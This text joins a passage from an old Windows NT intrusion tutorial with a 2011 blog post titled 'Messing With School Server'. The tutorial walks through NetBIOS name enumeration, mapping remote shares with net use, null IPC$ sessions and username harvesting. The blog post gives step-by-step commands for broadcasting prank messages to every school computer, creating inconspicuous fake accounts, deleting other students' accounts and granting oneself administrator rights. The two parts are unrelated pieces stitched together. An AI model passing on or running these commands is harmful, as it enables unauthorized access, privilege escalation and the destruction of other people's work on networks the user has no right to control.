MR_B10NDE <00> UNIQUE Registered
WINSEKURE LABS <00> GROUP Registered
MR_B10NDE <03> UNIQUE Registered
MR_B10NDE <20> UNIQUE Registered
WINSEKURE LABS <1E> GROUP Registered

MAC Address = 44-45-53-54-00-00

Using the table below, what can you learn about the machine?

Name Number Type Usage
=========================================================================
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0.
An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it’s share of vulnerabilities, so this type of information is certainly useful to an intruder.
The next step for an intruder would be to try and list the open shares on the given computer, using the net view command, Here is an example of the net view command used against my box with the open shares C:\ and C:\MP3S\
C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139

Sharename Type Comment
-----------------------------------------------------------------
C Disk Drive C:\
MP3S Disk My collection of MP3s
The command was completed successfully.
This information would give the intruder a list of shares which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive which he could then browse:
C:\>net use G: \\195.171.236.139\C
The command was completed successfully.

C:\>G:

G:\>
However, If the intruder was targetting a large network rather than a single remote computer, the next logical step would be to glean possible usernames from the remote machine.
A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins.
Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools
The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials.
To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:
c:\>net use \\[ip address of target machine]\ipc$ "" /user:""
If the connection is successful, the intruder could do a number of things other than gleaning a user list, but lets start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As a stand alone tool, this process is manual and very time consuming. Userlist.pl is a perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information.
At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine.
Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user – all through a null IPC session. This information gathering ability will appear in Rhino9′s soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.
With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows:
c:\>net view \\[ip address of remote machine]
Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons):
C:\>net view \\0.0.0.0
System error 5 has occurred.

Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name Type Used as Comment

---------------------------------------------------------------------
Accelerator Disk Agent Accelerator share for Seagate backup
Inetpub Disk
mirc Disk
NETLOGON Disk Logon server share
www_pages Disk
The command completed successfully.
As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored.
Once this list of shares had been given, the intruder could then proceed to issue the net use commands as described above.

Wednesday, November 2, 2011

Messing With School Server

Sending messages out over the network




Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send <domain> * "The server is h4x0r3d"

*Note: <domain> may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*

Where <domain> is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Varndean * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"

use commas to divide the names and NO SPACES between them.


Adding/modifying user accounts




Now that you have a command prompt, you can add a new user (ie yourself) like so

C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'

C:>net user JohnSmith fruity /ADD

Right then, now that we can create accounts, let's delete them:)

C:>net user JohnSmith /DELETE

This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them:)

Let's give you admin priveleges:)

C:>net localgroup administrator JohnSmith /ADD

This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing

C:>net localgroup

Running .exe files you can't usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.